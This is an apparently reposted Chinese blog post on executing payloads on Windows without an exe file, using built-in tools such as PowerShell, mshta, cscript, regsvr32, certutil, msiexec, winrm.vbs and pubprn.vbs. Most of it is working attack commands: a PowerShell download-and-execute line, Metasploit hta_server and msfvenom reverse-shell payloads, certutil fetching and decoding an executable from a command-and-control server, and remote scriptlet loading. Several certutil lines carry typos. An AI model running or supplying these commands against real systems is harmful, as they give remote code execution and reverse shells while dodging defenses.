windows无exe

windows无exewindows无exe加载脚本方式恶意脚本加载powershellmshta.exeCScript.exe&WScript.exeWindows原生工具加载regsvr32.exedllsctcertutil.exewinrm.vbsmsiexec.exewmic.exepubprn.vbs参考加载脚本方式利用Windows自带的解析器:PowerShell、VBScript、批处理文件和JavaScript,对应的应用程序分别为powershell.exe、cscript.exe、cmd.ex

大家好,又见面了,我是你们的朋友全栈君。

加载脚本方式

利用Windows自带的解析器:PowerShell、VBScript、批处理文件和JavaScript,对应的应用程序分别为powershell.exe、cscript.exe、cmd.exe和mshta.exe。利用上传或远程加载对应payload脚本,直接调用解析器运行(可以使用Invoke-Obfuscation或者 Invoke-DOSfuscation 等进行混淆)
用Windows自带的工具或脚本等原生工具实现执行恶意代码、启动程序、执行脚本、窃取数据、横向扩展、维持访问等,常用的有regsvr32.exe、rundll32.exe、certutil.exe、schtasks.exe、wmic.exe等,脚本类型的有:winrm.vbs、wmiexec.vbs、pubprn.vbs等

恶意脚本加载

powershell

powershell "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/Script.ps1'); Script [argv]"

mshta.exe

msf

use exploit/windows/misc/hta_server
set lhost x.x.x.x
set lport 4444
run

windows执行

mshta http://192.168.164.128:8080/lWdH9aFeeIe.hta

在这里插入图片描述

CScript.exe&WScript.exe

上述两个工具都可以解析运行vbs和js的脚本。但值得注意的是WScript是将输出结果以对话框的形式显示,而CScript是以命令行的形式显示输出结果。使用也很简单:cscript %TEMP%\log.vbs 或者 wscript C:\test.js

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.164.128 lport=4444 -f vbs -o 123.vbs
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
run
cscript 123.vbs

Windows原生工具加载

regsvr32.exe

dll

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.164.128 lport=4444 -f dll -o 123.dll
regsvr32 /u /s 123.dll

sct

参考
https://github.com/GreatSCT/GreatSCT

certutil.exe

certuil.exe -urlcache -split -f [URL] outfile.file
certutil.exe -verifyctl -f -split http://www.baidu.com #无法绕过defender

编码

base64 payload.exe > /var/www/html/update.txt

解码执行

certutril -urlcache -split -f http://cc_server/update.txt & certurl -decode update.txt update.exe & update.exe

winrm.vbs

cscript C:\windows\system32\winrm.vbs invoke Create wmicimv2/Win32_Process -SkipCAcheck -SkipCNcheck -file:123.xml

123.xml

<?xml version="1.0" encoding="UTF-8"?>
<p:Create_INPUT xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Process">
   <p:CommandLine>calc.exe</p:CommandLine>
   <p:CurrentDirectory>C:\</p:CurrentDirectory>
</p:Create_INPUT>

在这里插入图片描述
无文件

Winrm invoke Create wmicimv2/Win32_Process @{ 
   CommandLine="calc.exe";CurrentDirectory="C:\"}

在这里插入图片描述

msiexec.exe

C:\Windows\System32\msiexec.exe /q /i http://192.168.164.128:8080/123.msi

复现出错

wmic.exe

# 暂无

pubprn.vbs

C:\Windows\System32\Printing_Admin_Scripts
下语言目录下
可以用来解析sct

pubprn.vbs 127.0.0.1 script:http://x.x.x.x/payload1.sct

参考

https://github.com/GreatSCT/GreatSCT
Windows-noFile

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/159696.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • Vue 提交表单[通俗易懂]

    Vue 提交表单[通俗易懂]1、form标签@submit.prevent=”submit($event)”<form@submit.prevent=”submit($event)”><inputtype=”text”class=”form-control”placeholder=”请输入姓名”name=”username”><inputtype=”s…

  • php foreach跳出本次/当前循环与终止循环方法

    php foreach跳出本次/当前循环与终止循环方法

  • SSM整合,非常详细的SSM整合[通俗易懂]

    SSM整合,非常详细的SSM整合[通俗易懂]对于ssm框架网上有很多,这里只是自己为大家提供的一个ssm整合框架参考分享,这个前提是基于maven的管理工具写的,如果觉得写得不好,博主这边已经把代码上传了:不妨可以参考代码再理解学习:https://download.csdn.net/download/qq_30764991/11012764如果觉得文章不错,对你有帮助,请作者喝杯咖啡,谢谢!如果对您有帮助,请多多支持.多少都…

  • awvs扫描器原理_条形码扫描器现在无法使用

    awvs扫描器原理_条形码扫描器现在无法使用AWVSAWVS(WebVulnerabilityScanner)是一个自动化的Web应用程序安全测试工具,它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。适用于任何中小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。WVS可以通过检查SQL注入攻击漏洞、XSS跨站脚本攻击漏洞等漏洞来审核Web应用程序的安全性。AWVS功能介绍WebScanner:核心功能,web安全漏洞扫描(深度,宽度,限制20个)Site

  • 为什么说Python 是大数据全栈式开发语言

    为什么说Python 是大数据全栈式开发语言欢迎大家访问我的个人网站《刘江的博客和教程》:"www.liujiangblog.com"主要分享Python及Django教程以及相关的博客原文链接http://www

  • linux解压gz.gz文件,linux解压tar.gz并重命名_linux解压tar.gz文件

    linux解压gz.gz文件,linux解压tar.gz并重命名_linux解压tar.gz文件原标题:linux解压tar.gz并重命名_linux解压tar.gz文件命名为jpg.tar.gztar–cjfjpg.tar.bz2*.jpg//将目录里所有jpg文件打包成jpg.tar后,并且将其需要先下载zipforlinux解压tar–xvffile.tar//解压tar包tar-xzvffile.tar.gz//解压tar.gztaCSDN提供了…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号